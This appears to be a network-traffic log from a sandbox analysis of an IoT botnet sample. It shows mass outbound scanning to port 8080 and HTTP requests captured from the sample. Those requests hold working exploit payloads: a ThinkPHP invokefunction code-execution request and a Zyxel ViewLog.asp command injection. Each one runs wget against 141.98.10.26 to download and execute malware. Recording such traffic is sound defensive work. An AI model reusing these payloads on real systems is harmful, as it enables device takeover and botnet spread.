Nov 22, 2023 08:37:53.648600101 CET	54329	8080	192.168.2.23	31.203.135.42
Nov 22, 2023 08:37:53.648602962 CET	54329	8080	192.168.2.23	94.240.165.139
Nov 22, 2023 08:37:53.648614883 CET	54329	8080	192.168.2.23	95.120.237.204
Nov 22, 2023 08:37:53.648617983 CET	54329	8080	192.168.2.23	94.135.53.210
Nov 22, 2023 08:37:53.648627043 CET	54329	8080	192.168.2.23	94.81.76.151
Nov 22, 2023 08:37:53.648629904 CET	54329	8080	192.168.2.23	94.0.2.114
Nov 22, 2023 08:37:53.648629904 CET	54329	8080	192.168.2.23	85.251.198.16
Nov 22, 2023 08:37:53.648633957 CET	54329	8080	192.168.2.23	62.108.79.191
Nov 22, 2023 08:37:53.648633957 CET	54329	8080	192.168.2.23	62.250.199.4
Nov 22, 2023 08:37:53.648633957 CET	54329	8080	192.168.2.23	62.67.227.162
Nov 22, 2023 08:37:53.648648024 CET	54329	8080	192.168.2.23	31.180.223.37
Nov 22, 2023 08:37:53.648648024 CET	54329	8080	192.168.2.23	95.215.25.100
Nov 22, 2023 08:37:53.648662090 CET	54329	8080	192.168.2.23	62.221.32.243
Nov 22, 2023 08:37:53.648662090 CET	54329	8080	192.168.2.23	95.144.99.20
Nov 22, 2023 08:37:53.648663044 CET	54329	8080	192.168.2.23	31.12.230.15
Nov 22, 2023 08:37:53.648691893 CET	54329	8080	192.168.2.23	85.255.96.245
Nov 22, 2023 08:37:53.648695946 CET	54329	8080	192.168.2.23	31.27.200.193
Nov 22, 2023 08:37:53.648708105 CET	54329	8080	192.168.2.23	62.76.198.246
Nov 22, 2023 08:37:53.648713112 CET	54329	8080	192.168.2.23	31.163.254.97
Nov 22, 2023 08:37:53.648713112 CET	54329	8080	192.168.2.23	62.78.43.246
Nov 22, 2023 08:37:53.648713112 CET	54329	8080	192.168.2.23	95.48.82.145
Nov 22, 2023 08:37:53.648713112 CET	54329	8080	192.168.2.23	94.135.156.216
Nov 22, 2023 08:37:53.648713112 CET	54329	8080	192.168.2.23	95.164.181.131
Nov 22, 2023 08:37:53.648713112 CET	54329	8080	192.168.2.23	95.176.20.239
Nov 22, 2023 08:37:53.648713112 CET	54329	8080	192.168.2.23	62.69.114.14
Nov 22, 2023 08:37:53.648713112 CET	54329	8080	192.168.2.23	31.26.209.101
Nov 22, 2023 08:37:53.648722887 CET	54329	8080	192.168.2.23	94.162.76.102
Nov 22, 2023 08:37:53.648722887 CET	54329	8080	192.168.2.23	62.107.187.105
Nov 22, 2023 08:37:53.648730993 CET	54329	8080	192.168.2.23	94.50.28.77
Nov 22, 2023 08:37:53.648732901 CET	54329	8080	192.168.2.23	31.189.80.111
Nov 22, 2023 08:37:53.648736000 CET	54329	8080	192.168.2.23	94.87.243.125
Nov 22, 2023 08:37:53.648737907 CET	54329	8080	192.168.2.23	85.47.153.179
Nov 22, 2023 08:37:53.648752928 CET	54329	8080	192.168.2.23	62.119.205.187
Nov 22, 2023 08:37:53.648752928 CET	54329	8080	192.168.2.23	95.225.208.49
Nov 22, 2023 08:37:53.648755074 CET	54329	8080	192.168.2.23	95.22.176.202
Nov 22, 2023 08:37:53.648765087 CET	54329	8080	192.168.2.23	62.229.18.82
Nov 22, 2023 08:37:53.648768902 CET	54329	8080	192.168.2.23	31.211.168.30
Nov 22, 2023 08:37:53.648775101 CET	54329	8080	192.168.2.23	94.53.205.206
Nov 22, 2023 08:37:53.648781061 CET	54329	8080	192.168.2.23	31.123.245.145
Nov 22, 2023 08:37:53.648783922 CET	54329	8080	192.168.2.23	85.23.230.187
Nov 22, 2023 08:37:53.648783922 CET	54329	8080	192.168.2.23	95.142.58.187
Nov 22, 2023 08:37:53.648783922 CET	54329	8080	192.168.2.23	31.76.196.92
Nov 22, 2023 08:37:53.648796082 CET	54329	8080	192.168.2.23	94.102.185.56
Nov 22, 2023 08:37:53.648808002 CET	54329	8080	192.168.2.23	95.158.232.231
Nov 22, 2023 08:37:53.648816109 CET	54329	8080	192.168.2.23	85.236.38.160
Nov 22, 2023 08:37:53.648828983 CET	54329	8080	192.168.2.23	85.140.131.187
Nov 22, 2023 08:37:53.648829937 CET	54329	8080	192.168.2.23	62.199.176.88
Nov 22, 2023 08:37:53.648830891 CET	54329	8080	192.168.2.23	31.30.254.144
Nov 22, 2023 08:37:53.648839951 CET	54329	8080	192.168.2.23	95.170.188.253
Nov 22, 2023 08:37:53.648839951 CET	54329	8080	192.168.2.23	31.220.213.121
Nov 22, 2023 08:37:53.648839951 CET	54329	8080	192.168.2.23	31.99.228.233
Nov 22, 2023 08:37:53.648839951 CET	54329	8080	192.168.2.23	95.155.41.255
Nov 22, 2023 08:37:53.648842096 CET	54329	8080	192.168.2.23	62.240.245.19
Nov 22, 2023 08:37:53.648842096 CET	54329	8080	192.168.2.23	31.28.234.69
Nov 22, 2023 08:37:53.648857117 CET	54329	8080	192.168.2.23	94.77.143.220
Nov 22, 2023 08:37:53.648864985 CET	54329	8080	192.168.2.23	94.249.12.11
Nov 22, 2023 08:37:53.648869038 CET	54329	8080	192.168.2.23	95.86.53.82
Nov 22, 2023 08:37:53.648874044 CET	54329	8080	192.168.2.23	95.4.89.145
Nov 22, 2023 08:37:53.648874044 CET	54329	8080	192.168.2.23	31.152.229.150
Nov 22, 2023 08:37:53.648874044 CET	54329	8080	192.168.2.23	31.134.103.185
Nov 22, 2023 08:37:53.648874044 CET	54329	8080	192.168.2.23	85.33.106.87
Nov 22, 2023 08:37:53.648874044 CET	54329	8080	192.168.2.23	94.155.165.11
Nov 22, 2023 08:37:53.648880005 CET	54329	8080	192.168.2.23	62.55.111.211
Nov 22, 2023 08:37:53.648901939 CET	54329	8080	192.168.2.23	62.87.148.28
Nov 22, 2023 08:37:53.648901939 CET	54329	8080	192.168.2.23	95.116.97.164
Nov 22, 2023 08:37:53.648902893 CET	54329	8080	192.168.2.23	31.242.179.20
Nov 22, 2023 08:37:53.648917913 CET	54329	8080	192.168.2.23	94.97.64.225
Nov 22, 2023 08:37:53.648925066 CET	54329	8080	192.168.2.23	31.231.100.19
Nov 22, 2023 08:37:53.648930073 CET	54329	8080	192.168.2.23	62.193.196.76
Nov 22, 2023 08:37:53.648931026 CET	54329	8080	192.168.2.23	94.18.171.190
Nov 22, 2023 08:37:53.648941040 CET	54329	8080	192.168.2.23	94.201.43.68
Nov 22, 2023 08:37:53.648951054 CET	54329	8080	192.168.2.23	85.165.231.36
Nov 22, 2023 08:37:53.648953915 CET	54329	8080	192.168.2.23	31.103.83.178
Nov 22, 2023 08:37:53.648955107 CET	54329	8080	192.168.2.23	85.225.91.103
Nov 22, 2023 08:37:53.648968935 CET	54329	8080	192.168.2.23	62.186.152.205
Nov 22, 2023 08:37:53.648972034 CET	54329	8080	192.168.2.23	85.179.139.165
Nov 22, 2023 08:37:53.648972034 CET	54329	8080	192.168.2.23	94.250.142.238
Nov 22, 2023 08:37:53.648972034 CET	54329	8080	192.168.2.23	94.58.133.77
Nov 22, 2023 08:37:53.648998022 CET	54329	8080	192.168.2.23	94.206.105.140
Nov 22, 2023 08:37:53.648998022 CET	54329	8080	192.168.2.23	85.193.185.37
Nov 22, 2023 08:37:53.648998022 CET	54329	8080	192.168.2.23	62.8.153.55
Nov 22, 2023 08:37:53.648998022 CET	54329	8080	192.168.2.23	85.8.95.38
Nov 22, 2023 08:37:53.649000883 CET	54329	8080	192.168.2.23	85.2.41.228
Nov 22, 2023 08:37:53.649008989 CET	54329	8080	192.168.2.23	31.99.132.138
Nov 22, 2023 08:37:53.649022102 CET	54329	8080	192.168.2.23	85.252.58.91
Nov 22, 2023 08:37:53.649024010 CET	54329	8080	192.168.2.23	85.55.154.0
Nov 22, 2023 08:37:53.649028063 CET	54329	8080	192.168.2.23	31.109.186.46
Nov 22, 2023 08:37:53.649033070 CET	54329	8080	192.168.2.23	94.117.115.82
Nov 22, 2023 08:37:53.649043083 CET	54329	8080	192.168.2.23	62.128.192.62
Nov 22, 2023 08:37:53.649051905 CET	54329	8080	192.168.2.23	62.101.251.191
Nov 22, 2023 08:37:53.649051905 CET	54329	8080	192.168.2.23	94.84.180.177
Nov 22, 2023 08:37:53.649058104 CET	54329	8080	192.168.2.23	94.105.33.229
Nov 22, 2023 08:37:53.649059057 CET	54329	8080	192.168.2.23	94.100.218.19
Nov 22, 2023 08:37:53.649065018 CET	54329	8080	192.168.2.23	94.194.87.92
Nov 22, 2023 08:37:53.649068117 CET	54329	8080	192.168.2.23	94.234.156.38
Nov 22, 2023 08:37:53.649072886 CET	54329	8080	192.168.2.23	85.81.71.214
Nov 22, 2023 08:37:53.649074078 CET	54329	8080	192.168.2.23	95.114.188.214
Nov 22, 2023 08:37:53.649076939 CET	54329	8080	192.168.2.23	31.82.118.48
Nov 22, 2023 08:37:53.649076939 CET	54329	8080	192.168.2.23	95.101.243.182
Nov 22, 2023 08:37:53.649080038 CET	54329	8080	192.168.2.23	62.23.99.125
Nov 22, 2023 08:37:53.649094105 CET	54329	8080	192.168.2.23	95.165.247.25
Nov 22, 2023 08:37:53.649094105 CET	54329	8080	192.168.2.23	31.64.70.58
Nov 22, 2023 08:37:53.649096012 CET	54329	8080	192.168.2.23	85.98.179.80
Nov 22, 2023 08:37:53.649112940 CET	54329	8080	192.168.2.23	85.249.3.173
Nov 22, 2023 08:37:53.649112940 CET	54329	8080	192.168.2.23	94.95.216.152
Nov 22, 2023 08:37:53.649113894 CET	54329	8080	192.168.2.23	95.2.240.36
Nov 22, 2023 08:37:53.649122953 CET	54329	8080	192.168.2.23	95.174.169.245
Nov 22, 2023 08:37:53.649123907 CET	54329	8080	192.168.2.23	94.126.97.2
Nov 22, 2023 08:37:53.649123907 CET	54329	8080	192.168.2.23	31.181.122.224
Nov 22, 2023 08:37:53.649135113 CET	54329	8080	192.168.2.23	62.18.175.42
Nov 22, 2023 08:37:53.649137974 CET	54329	8080	192.168.2.23	85.12.106.81
Nov 22, 2023 08:37:53.649146080 CET	54329	8080	192.168.2.23	31.30.73.132
Nov 22, 2023 08:37:53.649147034 CET	54329	8080	192.168.2.23	94.80.178.184
Nov 22, 2023 08:37:53.649158955 CET	54329	8080	192.168.2.23	31.167.254.74
Nov 22, 2023 08:37:53.649161100 CET	54329	8080	192.168.2.23	95.16.112.66
Nov 22, 2023 08:37:53.649161100 CET	54329	8080	192.168.2.23	94.183.175.113
Nov 22, 2023 08:37:53.649161100 CET	54329	8080	192.168.2.23	62.223.123.136
Nov 22, 2023 08:37:53.649161100 CET	54329	8080	192.168.2.23	62.55.219.120
Nov 22, 2023 08:37:53.649161100 CET	54329	8080	192.168.2.23	94.41.253.134
Nov 22, 2023 08:37:53.649168968 CET	54329	8080	192.168.2.23	31.146.208.146
Nov 22, 2023 08:37:53.649179935 CET	54329	8080	192.168.2.23	31.209.82.26
Nov 22, 2023 08:37:53.649179935 CET	54329	8080	192.168.2.23	94.237.163.228
Nov 22, 2023 08:37:53.649199009 CET	54329	8080	192.168.2.23	31.62.120.114
Nov 22, 2023 08:37:53.649213076 CET	54329	8080	192.168.2.23	94.97.228.84
Nov 22, 2023 08:37:53.649214029 CET	54329	8080	192.168.2.23	95.255.144.48
Nov 22, 2023 08:37:53.649214029 CET	54329	8080	192.168.2.23	31.225.140.1
Nov 22, 2023 08:37:53.649220943 CET	54329	8080	192.168.2.23	95.42.107.72
Nov 22, 2023 08:37:53.649224997 CET	54329	8080	192.168.2.23	95.159.232.228
Nov 22, 2023 08:37:53.649229050 CET	54329	8080	192.168.2.23	85.56.134.245
Nov 22, 2023 08:37:53.649233103 CET	54329	8080	192.168.2.23	31.80.125.13
Nov 22, 2023 08:37:53.649239063 CET	54329	8080	192.168.2.23	95.48.38.190
Nov 22, 2023 08:37:53.649251938 CET	54329	8080	192.168.2.23	94.30.155.207
Nov 22, 2023 08:37:53.649255037 CET	54329	8080	192.168.2.23	31.212.161.143
Nov 22, 2023 08:37:53.649255037 CET	54329	8080	192.168.2.23	31.5.64.25
Nov 22, 2023 08:37:53.649260044 CET	54329	8080	192.168.2.23	94.163.15.89
Nov 22, 2023 08:37:53.649269104 CET	54329	8080	192.168.2.23	94.72.174.213
Nov 22, 2023 08:37:53.649274111 CET	54329	8080	192.168.2.23	95.238.166.94
Nov 22, 2023 08:37:53.649281025 CET	54329	8080	192.168.2.23	95.86.201.90
Nov 22, 2023 08:37:53.649282932 CET	54329	8080	192.168.2.23	94.170.132.191
Nov 22, 2023 08:37:53.649290085 CET	54329	8080	192.168.2.23	62.177.192.248
Nov 22, 2023 08:37:53.649295092 CET	54329	8080	192.168.2.23	62.223.201.60
Nov 22, 2023 08:37:53.649301052 CET	54329	8080	192.168.2.23	31.42.240.159
Nov 22, 2023 08:37:53.649310112 CET	54329	8080	192.168.2.23	94.143.76.27
Nov 22, 2023 08:37:53.649317980 CET	54329	8080	192.168.2.23	95.183.187.98
Nov 22, 2023 08:37:53.649334908 CET	54329	8080	192.168.2.23	95.139.16.215
Nov 22, 2023 08:37:53.649334908 CET	54329	8080	192.168.2.23	31.163.239.201
Nov 22, 2023 08:37:53.649352074 CET	54329	8080	192.168.2.23	31.72.147.229
Nov 22, 2023 08:37:53.649352074 CET	54329	8080	192.168.2.23	94.131.161.67
Nov 22, 2023 08:37:53.649353027 CET	54329	8080	192.168.2.23	62.60.63.119
Nov 22, 2023 08:37:53.649354935 CET	54329	8080	192.168.2.23	62.167.0.253
Nov 22, 2023 08:37:53.649354935 CET	54329	8080	192.168.2.23	31.226.229.60
Nov 22, 2023 08:37:53.649358034 CET	54329	8080	192.168.2.23	62.82.184.147
Nov 22, 2023 08:37:53.649368048 CET	54329	8080	192.168.2.23	85.233.193.106
Nov 22, 2023 08:37:53.649375916 CET	54329	8080	192.168.2.23	62.43.135.65
Nov 22, 2023 08:37:53.649385929 CET	54329	8080	192.168.2.23	62.195.151.225
Nov 22, 2023 08:37:53.649389029 CET	54329	8080	192.168.2.23	85.182.131.208
Nov 22, 2023 08:37:53.649394989 CET	54329	8080	192.168.2.23	94.215.139.82
Nov 22, 2023 08:37:53.649396896 CET	54329	8080	192.168.2.23	62.37.64.91
Nov 22, 2023 08:37:53.649410963 CET	54329	8080	192.168.2.23	31.151.4.127
Nov 22, 2023 08:37:53.649410963 CET	54329	8080	192.168.2.23	95.14.40.78
Nov 22, 2023 08:37:53.649410963 CET	54329	8080	192.168.2.23	85.215.177.238
Nov 22, 2023 08:37:53.649425983 CET	54329	8080	192.168.2.23	94.120.73.135
Nov 22, 2023 08:37:53.649425983 CET	54329	8080	192.168.2.23	62.209.161.129
Nov 22, 2023 08:37:53.649426937 CET	54329	8080	192.168.2.23	95.190.200.185
Nov 22, 2023 08:37:53.649430037 CET	54329	8080	192.168.2.23	62.178.51.9
Nov 22, 2023 08:37:53.649445057 CET	54329	8080	192.168.2.23	62.232.63.89
Nov 22, 2023 08:37:53.649457932 CET	54329	8080	192.168.2.23	85.222.160.24
Nov 22, 2023 08:37:53.649460077 CET	54329	8080	192.168.2.23	85.47.89.31
Nov 22, 2023 08:37:53.649476051 CET	54329	8080	192.168.2.23	62.4.78.234
Nov 22, 2023 08:37:53.649482965 CET	54329	8080	192.168.2.23	31.75.209.33
Nov 22, 2023 08:37:53.649498940 CET	54329	8080	192.168.2.23	31.244.82.44
Nov 22, 2023 08:37:53.649508953 CET	54329	8080	192.168.2.23	85.195.45.197
Nov 22, 2023 08:37:53.649516106 CET	54329	8080	192.168.2.23	62.220.97.198
Nov 22, 2023 08:37:53.649516106 CET	54329	8080	192.168.2.23	31.40.115.104
Nov 22, 2023 08:37:53.649516106 CET	54329	8080	192.168.2.23	85.45.239.16
Nov 22, 2023 08:37:53.649535894 CET	54329	8080	192.168.2.23	62.164.198.230
Nov 22, 2023 08:37:53.649544001 CET	54329	8080	192.168.2.23	62.113.79.72
Nov 22, 2023 08:37:53.649544001 CET	54329	8080	192.168.2.23	94.117.30.53
Nov 22, 2023 08:37:53.649555922 CET	54329	8080	192.168.2.23	85.127.132.97
Nov 22, 2023 08:37:53.649560928 CET	54329	8080	192.168.2.23	31.167.43.82
Nov 22, 2023 08:37:53.649566889 CET	54329	8080	192.168.2.23	95.156.56.229
Nov 22, 2023 08:37:53.649566889 CET	54329	8080	192.168.2.23	31.235.147.254
Nov 22, 2023 08:37:53.649566889 CET	54329	8080	192.168.2.23	85.105.56.7
Nov 22, 2023 08:37:53.649574041 CET	54329	8080	192.168.2.23	95.136.191.159
Nov 22, 2023 08:37:53.649589062 CET	54329	8080	192.168.2.23	94.177.68.167
Nov 22, 2023 08:37:53.649591923 CET	54329	8080	192.168.2.23	85.159.135.101
Nov 22, 2023 08:37:53.649594069 CET	54329	8080	192.168.2.23	31.59.255.8
Nov 22, 2023 08:37:53.649606943 CET	54329	8080	192.168.2.23	95.25.212.93
Nov 22, 2023 08:37:53.649622917 CET	54329	8080	192.168.2.23	62.252.66.91
Nov 22, 2023 08:37:53.649626970 CET	54329	8080	192.168.2.23	62.160.25.86
Nov 22, 2023 08:37:53.649632931 CET	54329	8080	192.168.2.23	62.187.131.185
Nov 22, 2023 08:37:53.649646997 CET	54329	8080	192.168.2.23	31.88.119.60
Nov 22, 2023 08:37:53.649646997 CET	54329	8080	192.168.2.23	62.38.225.10
Nov 22, 2023 08:37:53.649646997 CET	54329	8080	192.168.2.23	95.149.132.31
Nov 22, 2023 08:37:53.649646997 CET	54329	8080	192.168.2.23	94.63.179.26
Nov 22, 2023 08:37:53.649656057 CET	54329	8080	192.168.2.23	95.84.97.160
Nov 22, 2023 08:37:53.649669886 CET	54329	8080	192.168.2.23	62.38.238.227
Nov 22, 2023 08:37:53.649672985 CET	54329	8080	192.168.2.23	94.88.100.58
Nov 22, 2023 08:37:53.649673939 CET	54329	8080	192.168.2.23	95.109.156.102
Nov 22, 2023 08:37:53.649688005 CET	54329	8080	192.168.2.23	31.192.19.253
Nov 22, 2023 08:37:53.649693012 CET	54329	8080	192.168.2.23	94.175.130.84
Nov 22, 2023 08:37:53.649703979 CET	54329	8080	192.168.2.23	95.42.101.87
Nov 22, 2023 08:37:53.649707079 CET	54329	8080	192.168.2.23	95.122.20.165
Nov 22, 2023 08:37:53.649719954 CET	54329	8080	192.168.2.23	62.161.89.244
Nov 22, 2023 08:37:53.649722099 CET	54329	8080	192.168.2.23	62.75.59.150
Nov 22, 2023 08:37:53.649735928 CET	54329	8080	192.168.2.23	85.21.201.230
Nov 22, 2023 08:37:53.649739027 CET	54329	8080	192.168.2.23	94.11.72.251
Nov 22, 2023 08:37:53.649754047 CET	54329	8080	192.168.2.23	62.70.121.167
Nov 22, 2023 08:37:53.649754047 CET	54329	8080	192.168.2.23	94.42.253.182
Nov 22, 2023 08:37:53.649765968 CET	54329	8080	192.168.2.23	95.111.138.210
Nov 22, 2023 08:37:53.649766922 CET	54329	8080	192.168.2.23	85.8.107.169
Nov 22, 2023 08:37:53.649772882 CET	54329	8080	192.168.2.23	94.55.188.42
Nov 22, 2023 08:37:53.649789095 CET	54329	8080	192.168.2.23	95.212.148.145
Nov 22, 2023 08:37:53.649791002 CET	54329	8080	192.168.2.23	62.230.45.159
Nov 22, 2023 08:37:53.649802923 CET	54329	8080	192.168.2.23	94.64.120.174
Nov 22, 2023 08:37:53.649808884 CET	54329	8080	192.168.2.23	62.187.25.249
Nov 22, 2023 08:37:53.649821997 CET	54329	8080	192.168.2.23	85.216.26.229
Nov 22, 2023 08:37:53.649832010 CET	54329	8080	192.168.2.23	95.134.162.51
Nov 22, 2023 08:37:53.649856091 CET	54329	8080	192.168.2.23	62.252.106.54
Nov 22, 2023 08:37:53.649857998 CET	54329	8080	192.168.2.23	94.32.226.229
Nov 22, 2023 08:37:53.649857998 CET	54329	8080	192.168.2.23	62.95.39.108
Nov 22, 2023 08:37:53.649873018 CET	54329	8080	192.168.2.23	85.34.202.32
Nov 22, 2023 08:37:53.649873018 CET	54329	8080	192.168.2.23	31.174.128.18
Nov 22, 2023 08:37:53.649873972 CET	54329	8080	192.168.2.23	31.157.159.51
Nov 22, 2023 08:37:53.649888039 CET	54329	8080	192.168.2.23	62.101.55.169
Nov 22, 2023 08:37:53.649893045 CET	54329	8080	192.168.2.23	62.18.108.139
Nov 22, 2023 08:37:53.649897099 CET	54329	8080	192.168.2.23	31.227.240.138

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port
0	192.168.2.23	48460	95.110.132.243	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:37:50.619829893 CET	316	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:37:50.811918974 CET	321	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Wed, 22 Nov 2023 07:37:31 GMT Connection: close Content-Length: 311 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1	192.168.2.23	52566	95.217.85.34	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:37:50.622884035 CET	316	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:37:50.818162918 CET	322	IN	HTTP/1.1 400 Bad Request Date: Wed, 22 Nov 2023 07:37:50 GMT Server: Apache/2 Content-Length: 226 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
2	192.168.2.23	49470	95.107.233.10	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:37:50.644356012 CET	318	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
3	192.168.2.23	51792	94.238.153.128	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:37:51.607940912 CET	417	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:37:52.179794073 CET	438	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:37:53.299488068 CET	547	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
4	192.168.2.23	59444	31.136.70.145	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:37:51.616332054 CET	418	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:37:52.211826086 CET	438	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
